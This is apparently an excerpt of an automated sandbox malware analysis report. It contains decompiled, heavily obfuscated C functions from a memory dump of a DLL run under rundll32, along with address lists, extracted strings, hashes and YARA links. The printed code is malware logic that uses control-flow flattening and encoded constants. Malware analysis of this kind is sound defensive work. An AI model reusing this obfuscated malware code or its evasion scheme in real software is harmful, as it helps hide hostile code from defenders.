				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t81);
				_v108 = 0x4020;
				_t107 = _t106 + 0x10;
				_v108 = _v108 | 0xdfbefd4e;
				_t104 = 0;
				_t93 = 0x4780154;
				_v108 = _v108 * 0x3e;
				_v108 = _v108 ^ 0x30412216;
				_v112 = 0xbf3;
				_v112 = _v112 + 0xffff6984;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x00007409;
				_v92 = 0x4893;
				_v92 = _v92 >> 0x10;
				_v92 = _v92 + 0xffff8f14;
				_v92 = _v92 ^ 0xffff9e16;
				_v80 = 0x29f5;
				_v80 = _v80 | 0xe4a86235;
				_v80 = _v80 ^ 0xe4a85888;
				_v96 = 0x3308;
				_v96 = _v96 | 0xc0097ca8;
				_v96 = _v96 << 0x10;
				_v96 = _v96 ^ 0x7fa80916;
				_v100 = 0x5a5f;
				_v100 = _v100 << 1;
				_v100 = _v100 | 0x7e8d1fb6;
				_v100 = _v100 ^ 0x7e8ddae5;
				_v104 = 0x4e9d;
				_v104 = _v104 >> 0xf;
				_v104 = _v104 * 0x58;
				_v104 = _v104 * 0x58;
				_v104 = _v104 ^ 0x00004577;
				_v84 = 0x3887;
				_v84 = _v84 ^ 0x60a41114;
				_v84 = _v84 | 0x0e68c4ed;
				_v84 = _v84 ^ 0x6eece375;
				_v88 = 0x522f;
				_v88 = _v88 + 0xffff0dcf;
				_v88 = _v88 ^ 0x1a929b95;
				_v88 = _v88 ^ 0xe56dd248;
				while(_t93 != 0x4780154) {
					if(_t93 == 0x6888588) {
						__eflags = E1001B399(_t103 + 4, _v104, __eflags, _v84,  &_v76, _v88);
						_t104 =  !=  ? 1 : _t104;
					} else {
						if(_t93 == 0x175477d0) {
							E1001BC32( &_v76, _v108, _t91, _v112, _v92);
							_t107 = _t107 + 0xc;
							_t93 = 0x250266e4;
							continue;
						} else {
							if(_t93 != 0x250266e4) {
								L9:
								__eflags = _t93 - 0x2b031d13;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_t90 = E1000D502(_t103,  &_v76, _v80, _v96, _v100);
								_t107 = _t107 + 0xc;
								if(_t90 != 0) {
									_t93 = 0x6888588;
									continue;
								}
							}
						}
					}
					return _t104;
				}
				_t93 = 0x175477d0;
				goto L9;
			}

0x100112ba
0x100112c1
0x100112c8
0x100112ca
0x100112cb
0x100112cc
0x100112cd
0x100112d2
0x100112da
0x100112dd
0x100112e5
0x100112ec
0x100112f6
0x100112fa
0x10011302
0x1001130a
0x10011312
0x10011317
0x1001131c
0x10011324
0x1001132c
0x10011331
0x10011339
0x10011341
0x10011349
0x10011351
0x10011359
0x10011361
0x10011369
0x1001136e
0x10011376
0x1001137e
0x10011382
0x1001138a
0x10011392
0x1001139a
0x100113a4
0x100113ad
0x100113b1
0x100113b9
0x100113c1
0x100113c9
0x100113d1
0x100113d9
0x100113e1
0x100113e9
0x100113f1
0x100113f9
0x10011403
0x10011485
0x10011487
0x10011405
0x1001140b
0x10011448
0x1001144d
0x10011450
0x00000000
0x1001140d
0x10011413
0x1001145c
0x1001145c
0x10011462
0x00000000
0x00000000
0x10011464
0x10011415
0x10011427
0x1001142c
0x10011431
0x10011433
0x00000000
0x10011433
0x10011431
0x10011413
0x1001140b
0x10011493
0x10011493
0x10011457
0x00000000

Strings

un, xrefs: 100113D1
t, xrefs: 1001131C
@, xrefs: 100112D2
/R, xrefs: 100113D9
wE, xrefs: 100113B1
_Z, xrefs: 10011376

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: t$ @$/R$_Z$un$wE
API String ID: 0-3242100037
Opcode ID: 3b47c789d72f15953d938d22ddd8894b9e2db61e4a578097bd58bcfec11e0b67
Instruction ID: 21666360a9b3b9f75de94d0b0a59df5f3b6659b513006e998aa2373369a6c1ab
Opcode Fuzzy Hash: 3b47c789d72f15953d938d22ddd8894b9e2db61e4a578097bd58bcfec11e0b67
Instruction Fuzzy Hash: 5F4177714083429FD358CF20D88641FBBE4FB88758F508A1DF496A6260D774CA4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 1000B22A, Relevance: 6.5, Strings: 5, Instructions: 229
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1000B22A() {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				short _t246;
				short _t249;
				void* _t259;
				void* _t260;
				void* _t263;
				void* _t270;
				void* _t273;
				intOrPtr _t276;
				short _t277;
				short* _t278;
				void* _t279;
				short* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int* _t286;

				_t286 =  &_v108;
				_t276 =  *0x10021fd8; // 0x0
				_v44 = 0xfb17;
				_t277 = _t276 + 0x22c;
				_v44 = _v44 ^ 0x027da679;
				_t259 = 0x7745d4e;
				_v44 = _v44 ^ 0xad5189ae;
				_v44 = _v44 ^ 0xaf2cbc4e;
				_v20 = 0x9cbe;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0013d1bb;
				_v64 = 0xb6c3;
				_v64 = _v64 | 0x8ceac323;
				_t281 = 0x4a;
				_v64 = _v64 * 0x4c;
				_v64 = _v64 ^ 0xd5c1d69f;
				_v36 = 0x7dd1;
				_v36 = _v36 + 0xffffb74b;
				_v36 = _v36 ^ 0x000079c7;
				_v104 = 0x8704;
				_v104 = _v104 ^ 0xb281bbbf;
				_v104 = _v104 << 1;
				_v104 = _v104 ^ 0xfb8fb2d4;
				_v104 = _v104 ^ 0x9e8d928a;
				_v108 = 0x1be7;
				_v108 = _v108 << 8;
				_v108 = _v108 | 0xffbeffef;
				_v108 = _v108 ^ 0xffbfdebc;
				_v60 = 0x4b3a;
				_v60 = _v60 ^ 0x7b1fd3a1;
				_v60 = _v60 / _t281;
				_v60 = _v60 ^ 0x01a9904e;
				_v24 = 0x5d4f;
				_v24 = _v24 ^ 0xf5181fb0;
				_v24 = _v24 ^ 0xf51873aa;
				_v28 = 0x71f1;
				_v28 = _v28 ^ 0xdd2998f0;
				_v28 = _v28 ^ 0xdd298815;
				_v32 = 0x25c8;
				_v32 = _v32 << 0xa;
				_v32 = _v32 ^ 0x00976b21;
				_v48 = 0x3f8d;
				_v48 = _v48 + 0x60e3;
				_t282 = 0x66;
				_v48 = _v48 * 0x42;
				_v48 = _v48 ^ 0x00291d63;
				_v100 = 0x51a1;
				_v100 = _v100 | 0xc517db51;
				_v100 = _v100 ^ 0x0cc60a5a;
				_v100 = _v100 * 0x7f;
				_v100 = _v100 ^ 0x1f176245;
				_v52 = 0x1fd5;
				_v52 = _v52 << 4;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x00feb526;
				_v56 = 0xd83d;
				_v56 = _v56 ^ 0x95e32b8c;
				_v56 = _v56 << 7;
				_v56 = _v56 ^ 0xf1f9a222;
				_v92 = 0xc508;
				_v92 = _v92 >> 2;
				_v92 = _v92 * 0x59;
				_v92 = _v92 * 0x66;
				_v92 = _v92 ^ 0x06d2de05;
				_v12 = 0x31a;
				_v12 = _v12 / _t282;
				_v12 = _v12 ^ 0x00003592;
				_v16 = 0x2494;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x09253183;
				_v96 = 0x6c76;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x0e7eef47;
				_v96 = _v96 | 0xad17f9f2;
				_v96 = _v96 ^ 0xaf7f91af;
				_v80 = 0x8a06;
				_v80 = _v80 | 0x53af1180;
				_v80 = _v80 * 0x33;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x0000b93e;
				_v84 = 0xdeab;
				_v84 = _v84 | 0x9a0bc06e;
				_v84 = _v84 << 9;
				_v84 = _v84 + 0xffffffe8;
				_v84 = _v84 ^ 0x17bdcfd9;
				_v8 = 0x7784;
				_v8 = _v8 * 0x32;
				_v8 = _v8 ^ 0x00172d44;
				_v88 = 0x8bb3;
				_v88 = _v88 << 0xd;
				_v88 = _v88 | 0xfc17ffbf;
				_v88 = _v88 ^ 0xfd77da45;
				_v40 = 0xcc8b;
				_v40 = _v40 + 0xffffc35b;
				_v40 = _v40 + 0xffff56f4;
				_v40 = _v40 ^ 0xffff9e7a;
				_v68 = 0xebec;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0xf5ab4ccd;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x03d74976;
				_v72 = 0xd009;
				_v72 = _v72 + 0xffff5c3e;
				_v72 = _v72 << 5;
				_v72 = _v72 << 3;
				_v72 = _v72 ^ 0x002c2ebb;
				_v76 = 0x459a;
				_v76 = _v76 >> 0xc;
				_v76 = _v76 + 0xfffffdfe;
				_v76 = _v76 + 0xffffbd16;
				_v76 = _v76 ^ 0xffff9ca3;
				do {
					while(_t259 != 0x6a50839) {
						if(_t259 == 0x7745d4e) {
							_t249 = E10013B73();
							_v4 = _t249;
							_t259 = 0x2f0c27ee;
							continue;
						}
						if(_t259 == 0x12348a90) {
							E1001C7CD( &_v4, _t277, _v40, _v68, _v72, 1, 3, _v76);
							__eflags = 0;
							 *((short*)(_t277 + 6)) = 0;
							return 0;
						}
						_t294 = _t259 - 0x2f0c27ee;
						if(_t259 != 0x2f0c27ee) {
							goto L8;
						}
						_t273 = 4;
						_t263 = 0x10;
						_t284 = E100180F6(_t263, _t273, _t294);
						E1001C7CD( &_v4, _t277, _v60, _v24, _v28, 2, 1, _v32);
						_t279 = _t277 + 2;
						E1001C7CD( &_v4, _t279, _v48, _v100, _v52, 1, _t284, _v56);
						_t286 = _t286 - 0x10 + 0x40;
						_t280 = _t279 + _t284 * 2;
						_t259 = 0x6a50839;
						_t249 = 0x5c;
						 *_t280 = _t249;
						_t277 = _t280 + 2;
					}
					_t270 = 4;
					_t260 = 0x10;
					_t283 = E100180F6(_t260, _t270, __eflags);
					E1001C7CD( &_v4, _t277, _v80, _v84, _v8, 1, _t283, _v88);
					_t286 = _t286 - 0x10 + 0x28;
					_t278 = _t277 + _t283 * 2;
					_t259 = 0x12348a90;
					_t246 = 0x2e;
					 *_t278 = _t246;
					_t277 = _t278 + 2;
					__eflags = _t277;
					L8:
					__eflags = _t259 - 0x325243ef;
				} while (__eflags != 0);
				return _t249;
			}

0x1000b22a
0x1000b230
0x1000b238
0x1000b240
0x1000b246
0x1000b24e
0x1000b253
0x1000b25b
0x1000b263
0x1000b26b
0x1000b270
0x1000b278
0x1000b280
0x1000b28f
0x1000b292
0x1000b296
0x1000b29e
0x1000b2a6
0x1000b2ae
0x1000b2b6
0x1000b2be
0x1000b2c6
0x1000b2ca
0x1000b2d2
0x1000b2da
0x1000b2e2
0x1000b2e7
0x1000b2ef
0x1000b2f7
0x1000b2ff
0x1000b30f
0x1000b313
0x1000b31b
0x1000b323
0x1000b32b
0x1000b333
0x1000b33b
0x1000b343
0x1000b34b
0x1000b353
0x1000b358
0x1000b360
0x1000b368
0x1000b375
0x1000b376
0x1000b37a
0x1000b382
0x1000b38a
0x1000b392
0x1000b39f
0x1000b3a3
0x1000b3ab
0x1000b3b3
0x1000b3b8
0x1000b3bd
0x1000b3c5
0x1000b3cd
0x1000b3d5
0x1000b3da
0x1000b3e2
0x1000b3ea
0x1000b3f4
0x1000b3fd
0x1000b401
0x1000b409
0x1000b417
0x1000b41b
0x1000b428
0x1000b430
0x1000b435
0x1000b43d
0x1000b445
0x1000b44a
0x1000b452
0x1000b45a
0x1000b462
0x1000b46a
0x1000b477
0x1000b47b
0x1000b480
0x1000b488
0x1000b490
0x1000b498
0x1000b49d
0x1000b4a2
0x1000b4aa
0x1000b4b7
0x1000b4bb
0x1000b4c3
0x1000b4cb
0x1000b4d0
0x1000b4d8
0x1000b4e0
0x1000b4e8
0x1000b4f0
0x1000b4f8
0x1000b500
0x1000b508
0x1000b50d
0x1000b515
0x1000b51a
0x1000b522
0x1000b52a
0x1000b532
0x1000b537
0x1000b53c
0x1000b544
0x1000b54c
0x1000b551
0x1000b559
0x1000b561
0x1000b569
0x1000b569
0x1000b57b
0x1000b622
0x1000b627
0x1000b62b
0x00000000
0x1000b62b
0x1000b587
0x1000b6b2
0x1000b6ba
0x1000b6bc
0x00000000
0x1000b6bc
0x1000b58d
0x1000b58f
0x00000000
0x00000000
0x1000b5aa
0x1000b5ad
0x1000b5c8
0x1000b5d5
0x1000b5de
0x1000b5fc
0x1000b601
0x1000b604
0x1000b607
0x1000b60e
0x1000b60f
0x1000b612
0x1000b612
0x1000b647
0x1000b64a
0x1000b654
0x1000b671
0x1000b676
0x1000b679
0x1000b67c
0x1000b683
0x1000b684
0x1000b687
0x1000b687
0x1000b68a
0x1000b68a
0x1000b68a
0x00000000

Strings

`, xrefs: 1000B368
vl, xrefs: 1000B43D
CR2, xrefs: 1000B68A
O], xrefs: 1000B31B
:K, xrefs: 1000B2F7

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :K$O]$vl$CR2$`
API String ID: 0-2518798236
Opcode ID: 58e42fb82ab4959621715369ceec5704d143cecee4cc9f10e4d890faecd76eaf
Instruction ID: 6dfff7a76bf6358fa94fd74adadda3f551ac926e886d732143dc3f2ac86db4d6
Opcode Fuzzy Hash: 58e42fb82ab4959621715369ceec5704d143cecee4cc9f10e4d890faecd76eaf
Instruction Fuzzy Hash: 98C101725093419FE364CF25C94A90BBBF1FBC4758F10490DF296962A0D7B58A49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 1001DA27, Relevance: 6.5, Strings: 5, Instructions: 210
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1001DA27(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				unsigned int _v80;
				signed int _v84;
				signed int _v88;
				void* _t176;
				signed int _t199;
				void* _t201;
				signed int _t205;
				char _t207;
				signed int _t208;
				void* _t210;
				char* _t216;
				signed int _t238;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int* _t250;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0x40);
				E10017B8C(_t176);
				_v20 = 0x10;
				_t250 =  &(( &_v88)[6]);
				_v60 = 0x9b2b;
				_t208 = 0;
				_t210 = 0x7d32fb0;
				_t240 = 0x1b;
				_v60 = _v60 / _t240;
				_t238 = 0x5a;
				_t241 = 0x17;
				_v60 = _v60 * 0x17;
				_v60 = _v60 ^ 0x0000c45d;
				_v64 = 0xbb87;
				_v64 = _v64 + 0x844f;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000024b7;
				_v68 = 0x28e2;
				_v68 = _v68 * 9;
				_v68 = _v68 / _t238;
				_v68 = _v68 ^ 0x00006a39;
				_v72 = 0x45da;
				_v72 = _v72 | 0xbd600cc5;
				_v72 = _v72 << 5;
				_v72 = _v72 ^ 0xac09c673;
				_v56 = 0x2d3a;
				_v56 = _v56 / _t241;
				_t242 = 0x50;
				_v56 = _v56 / _t242;
				_v56 = _v56 ^ 0x00007268;
				_v48 = 0x1d10;
				_v48 = _v48 | 0x24dbc23b;
				_v48 = _v48 ^ 0x24dba960;
				_v40 = 0x92d8;
				_t243 = 0x5d;
				_v40 = _v40 / _t243;
				_v40 = _v40 ^ 0x0000480b;
				_v44 = 0x6b0d;
				_v44 = _v44 ^ 0x00001756;
				_v80 = 0x1084;
				_t244 = 0x3d;
				_v80 = _v80 / _t244;
				_v80 = _v80 + 0xffff91b6;
				_v80 = _v80 >> 0xd;
				_v80 = _v80 ^ 0x0007d861;
				_v84 = 0x6d65;
				_v84 = _v84 >> 0xd;
				_v84 = _v84 << 0xe;
				_v84 = _v84 + 0xc711;
				_v84 = _v84 ^ 0x0001d117;
				_v32 = 0x5a71;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x0002e5d7;
				_v36 = 0x996d;
				_t245 = 0x59;
				_v36 = _v36 / _t245;
				_v36 = _v36 ^ 0x00000e9a;
				_v88 = 0x32d4;
				_v88 = _v88 + 0x90cf;
				_v88 = _v88 | 0xbb95e1f6;
				_v88 = _v88 + 0xffff5eac;
				_v88 = _v88 ^ 0xbb9570bb;
				_v52 = 0x73ec;
				_t122 =  &_v52; // 0x73ec
				_v52 =  *_t122 / _t238;
				_t128 =  &_v52; // 0x73ec
				_v52 =  *_t128 * 0x52;
				_v52 = _v52 ^ 0x00005ccf;
				_v76 = 0xf1e5;
				_v76 = _v76 << 6;
				_v76 = _v76 * 0x58;
				_v76 = _v76 + 0xffff574d;
				_v76 = _v76 ^ 0x14c94c40;
				_v24 = 0xb24e;
				_v24 = _v24 + 0xffff9e8f;
				_v24 = _v24 ^ 0x00001564;
				_v28 = 0x36b7;
				_v28 = _v28 | 0xb2e4a645;
				_v28 = _v28 ^ 0xb2e4bcd6;
				while(_t210 != 0x7d32fb0) {
					if(_t210 == 0x10d00485) {
						_t199 = E1001888F( &_v16,  &_v20, _v60, _v64, _v68, _v72);
						_t250 =  &(_t250[4]);
						__eflags = _t199;
						if(__eflags == 0) {
							L21:
							return _t208;
						}
						_t210 = 0x262978ce;
						continue;
					}
					if(_t210 == 0x19b04eec) {
						_push(0x100014f8);
						_t201 = E10003F0A(_v56, _v48, __eflags);
						_t205 = E10001C6E(_t201, _v84, _v32, 0x40, _a4, _v36, _v88, E100107D3(__eflags),  &_v16);
						__eflags = _t205;
						_t174 = _t205 > 0;
						__eflags = _t174;
						_t208 = 0 | _t174;
						E1000717B(_v52, _v76, _v24, _t201, _v28);
						goto L21;
					}
					if(_t210 != 0x262978ce) {
						L18:
						__eflags = _t210 - 0x25904d10;
						if(__eflags != 0) {
							continue;
						}
						goto L21;
					}
					_t216 =  &_v16;
					if(_v16 == _t208) {
						L14:
						_t210 = 0x19b04eec;
						continue;
					} else {
						goto L6;
					}
					do {
						L6:
						_t207 =  *_t216;
						if(_t207 < 0x30 || _t207 > 0x39) {
							if(_t207 < 0x61 || _t207 > 0x7a) {
								if(_t207 < 0x41 || _t207 > 0x5a) {
									 *_t216 = 0x58;
								}
							}
						}
						_t216 = _t216 + 1;
					} while ( *_t216 != _t208);
					goto L14;
				}
				_t210 = 0x10d00485;
				goto L18;
			}

0x1001da2e
0x1001da32
0x1001da36
0x1001da3a
0x1001da3e
0x1001da3f
0x1001da41
0x1001da46
0x1001da4e
0x1001da51
0x1001da5f
0x1001da61
0x1001da68
0x1001da6d
0x1001da78
0x1001da7b
0x1001da7e
0x1001da82
0x1001da8a
0x1001da92
0x1001da9a
0x1001da9f
0x1001daa7
0x1001dab4
0x1001dac0
0x1001dac4
0x1001dacc
0x1001dad4
0x1001dadc
0x1001dae1
0x1001dae9
0x1001daf9
0x1001db01
0x1001db06
0x1001db0c
0x1001db14
0x1001db1c
0x1001db24
0x1001db2c
0x1001db38
0x1001db3d
0x1001db43
0x1001db4b
0x1001db5b
0x1001db63
0x1001db6f
0x1001db72
0x1001db76
0x1001db7e
0x1001db83
0x1001db8d
0x1001db9a
0x1001db9f
0x1001dba4
0x1001dbac
0x1001dbb4
0x1001dbbc
0x1001dbc1
0x1001dbc9
0x1001dbd7
0x1001dbe1
0x1001dbe5
0x1001dbed
0x1001dbf5
0x1001dbfd
0x1001dc05
0x1001dc0d
0x1001dc15
0x1001dc1d
0x1001dc28
0x1001dc2c
0x1001dc31
0x1001dc35
0x1001dc3d
0x1001dc45
0x1001dc4f
0x1001dc53
0x1001dc5b
0x1001dc63
0x1001dc6b
0x1001dc73
0x1001dc7b
0x1001dc83
0x1001dc8b
0x1001dc93
0x1001dc9d
0x1001dcef
0x1001dcf4
0x1001dcf7
0x1001dcf9
0x1001dd79
0x1001dd7f
0x1001dd7f
0x1001dcfb
0x00000000
0x1001dcfb
0x1001dca1
0x1001dd13
0x1001dd18
0x1001dd51
0x1001dd5c
0x1001dd67
0x1001dd67
0x1001dd67
0x1001dd6e
0x00000000
0x1001dd73
0x1001dca5
0x1001dd01
0x1001dd01
0x1001dd07
0x00000000
0x00000000
0x00000000
0x1001dd09
0x1001dca7
0x1001dcaf
0x1001dcd3
0x1001dcd3
0x00000000
0x00000000
0x00000000
0x00000000
0x1001dcb1
0x1001dcb1
0x1001dcb1
0x1001dcb5
0x1001dcbd
0x1001dcc5
0x1001dccb
0x1001dccb
0x1001dcc5
0x1001dcbd
0x1001dcce
0x1001dccf
0x00000000
0x1001dcb1
0x1001dcff
0x00000000

Strings

em, xrefs: 1001DB8D
9j, xrefs: 1001DAC4
qZ, xrefs: 1001DBB4
k, xrefs: 1001DB4B
s], xrefs: 1001DC1D

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: k$9j$em$qZ$s]
API String ID: 0-39266908
Opcode ID: 9c01c87a95b7982203afb8b1870d89b0aaa418c51ee5b74b140b399e1bddb871
Instruction ID: f0a19c6ead4872748faee28a4937b9d951c0c7833f70f0601fcc14f771148398
Opcode Fuzzy Hash: 9c01c87a95b7982203afb8b1870d89b0aaa418c51ee5b74b140b399e1bddb871
Instruction Fuzzy Hash: 88918271508341AFE354EF25C88594FBBE2FBC5748F40881EF2958A2A0D3B1C94ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 1001E9A2, Relevance: 6.4, Strings: 5, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001E9A2() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t168;
				signed int _t169;
				void* _t176;
				void* _t199;
				intOrPtr _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				signed int* _t215;

				_t215 =  &_v76;
				_v16 = 0x11c573;
				_v12 = 0x2735f7;
				_t176 = 0x25971f;
				_v8 = 0x7795d1;
				_t205 = 0;
				_v4 = 0;
				_v52 = 0x5ad8;
				_t206 = 0x77;
				_v52 = _v52 * 0x5a;
				_v52 = _v52 ^ 0x4e5e8a89;
				_v52 = _v52 ^ 0x4e406579;
				_v64 = 0x1697;
				_v64 = _v64 << 3;
				_v64 = _v64 * 0x27;
				_v64 = _v64 / _t206;
				_v64 = _v64 ^ 0x00001aa5;
				_v68 = 0x4111;
				_v68 = _v68 + 0xffffd52e;
				_v68 = _v68 + 0xffff40e7;
				_t207 = 0x7a;
				_v68 = _v68 / _t207;
				_v68 = _v68 ^ 0x021951d5;
				_v36 = 0xf691;
				_v36 = _v36 << 5;
				_v36 = _v36 << 4;
				_v36 = _v36 ^ 0x01ed35b1;
				_v48 = 0x327a;
				_v48 = _v48 | 0x17f8b193;
				_v48 = _v48 >> 0xe;
				_v48 = _v48 ^ 0x00002d4d;
				_v76 = 0x897;
				_v76 = _v76 << 1;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 >> 0xc;
				_v76 = _v76 ^ 0x00002f4c;
				_v72 = 0x6aac;
				_v72 = _v72 + 0xffffe627;
				_t208 = 0x47;
				_v72 = _v72 * 0x4b;
				_v72 = _v72 + 0xa6af;
				_v72 = _v72 ^ 0x00185ee0;
				_v40 = 0x6ff7;
				_v40 = _v40 ^ 0x64ce7315;
				_v40 = _v40 | 0x8bc7b626;
				_v40 = _v40 ^ 0xefcf95c7;
				_v24 = 0xe104;
				_v24 = _v24 * 0x43;
				_v24 = _v24 ^ 0x003a9fcf;
				_v28 = 0x3161;
				_v28 = _v28 << 4;
				_v28 = _v28 ^ 0x00031703;
				_v44 = 0x502c;
				_v44 = _v44 << 0xf;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x0502f912;
				_v56 = 0x406;
				_v56 = _v56 / _t208;
				_v56 = _v56 | 0xb2dcf4c3;
				_v56 = _v56 ^ 0x0242a411;
				_v56 = _v56 ^ 0xb09e7db6;
				_v20 = 0xbcf1;
				_v20 = _v20 | 0x8cb70da1;
				_v20 = _v20 ^ 0x8cb7ffb5;
				_v60 = 0x53bb;
				_t209 = 0x5f;
				_v60 = _v60 / _t209;
				_v60 = _v60 | 0xee2197e9;
				_t210 = 0x6f;
				_t175 = _v20;
				_t214 = _v20;
				_t211 = _v20;
				_v60 = _v60 / _t210;
				_t168 = 0x1893b6d9;
				_v60 = _v60 ^ 0x02253942;
				_v32 = 0xd0c2;
				_v32 = _v32 << 2;
				_v32 = _v32 + 0xffff8566;
				_v32 = _v32 ^ 0x000dc851;
				while(1) {
					L1:
					_t199 = 0x5c;
					while(_t176 != 0x25971f) {
						if(_t176 == 0x78576ce) {
							_t169 = E100045DE(_t176, _v64, _v68, _t176, _v32, _v36);
							_t175 = _t169;
							_t215 =  &(_t215[4]);
							if(_t169 != 0) {
								_t176 = 0x1cb0a3be;
								goto L11;
							}
						} else {
							if(_t176 == 0x9b24be8) {
								E1001EF5D(_v56, _v20, _t175, _v60);
							} else {
								if(_t176 == 0x167b413a) {
									_t212 =  *0x10021fd8; // 0x0
									_t213 = _t212 + 0x22c;
									while( *_t213 != _t199) {
										_t213 = _t213 + 2;
									}
									_t211 = _t213 + 2;
									_t176 = 0x78576ce;
									goto L12;
								} else {
									if(_t176 == _t168) {
										E1001865C(_v72, _t214, _v40);
										_t205 =  !=  ? 1 : _t205;
										_t176 = 0x19738764;
										goto L11;
									} else {
										if(_t176 == 0x19738764) {
											E1001EF5D(_v24, _v28, _t214, _v44);
											_t176 = 0x9b24be8;
											L11:
											_t199 = 0x5c;
											L12:
											_t168 = 0x1893b6d9;
											continue;
										} else {
											if(_t176 != 0x1cb0a3be) {
												L21:
												if(_t176 != 0x454bb11) {
													continue;
												} else {
												}
											} else {
												_t214 = E10014FA1(_t211, _v48, _v52, _t175, _v76);
												_t215 =  &(_t215[3]);
												_t168 = 0x1893b6d9;
												_t176 =  !=  ? 0x1893b6d9 : 0x9b24be8;
												goto L1;
											}
										}
									}
								}
							}
						}
						return _t205;
					}
					_t176 = 0x167b413a;
					goto L21;
				}
			}

0x1001e9a2
0x1001e9a5
0x1001e9af
0x1001e9b7
0x1001e9bc
0x1001e9c8
0x1001e9ca
0x1001e9ce
0x1001e9dd
0x1001e9e0
0x1001e9e4
0x1001e9ec
0x1001e9f4
0x1001e9fc
0x1001ea06
0x1001ea12
0x1001ea16
0x1001ea1e
0x1001ea26
0x1001ea2e
0x1001ea3a
0x1001ea3f
0x1001ea45
0x1001ea4d
0x1001ea55
0x1001ea5a
0x1001ea5f
0x1001ea67
0x1001ea6f
0x1001ea77
0x1001ea7c
0x1001ea84
0x1001ea8c
0x1001ea90
0x1001ea95
0x1001ea9a
0x1001eaa2
0x1001eaaa
0x1001eab7
0x1001eab8
0x1001eabc
0x1001eac4
0x1001eacc
0x1001ead4
0x1001eadc
0x1001eae4
0x1001eaec
0x1001eaf9
0x1001eafd
0x1001eb05
0x1001eb0d
0x1001eb12
0x1001eb1a
0x1001eb22
0x1001eb27
0x1001eb2c
0x1001eb34
0x1001eb42
0x1001eb46
0x1001eb4e
0x1001eb56
0x1001eb5e
0x1001eb66
0x1001eb70
0x1001eb78
0x1001eb86
0x1001eb8b
0x1001eb91
0x1001eb9d
0x1001eba0
0x1001eba4
0x1001eba8
0x1001ebac
0x1001ebb0
0x1001ebb5
0x1001ebbd
0x1001ebc5
0x1001ebca
0x1001ebd2
0x1001ebda
0x1001ebda
0x1001ebdc
0x1001ebdd
0x1001ebef
0x1001ecc5
0x1001ecca
0x1001eccc
0x1001ecd1
0x1001ecd3
0x00000000
0x1001ecd3
0x1001ebf5
0x1001ebfb
0x1001ecfa
0x1001ec01
0x1001ec07
0x1001ec94
0x1001ec9a
0x1001eca5
0x1001eca2
0x1001eca2
0x1001ecaa
0x1001ecad
0x00000000
0x1001ec0d
0x1001ec0f
0x1001ec7f
0x1001ec8a
0x1001ec8d
0x00000000
0x1001ec11
0x1001ec17
0x1001ec5c
0x1001ec63
0x1001ec68
0x1001ec6a
0x1001ec6b
0x1001ec6b
0x00000000
0x1001ec19
0x1001ec1f
0x1001ecdf
0x1001ece5
0x00000000
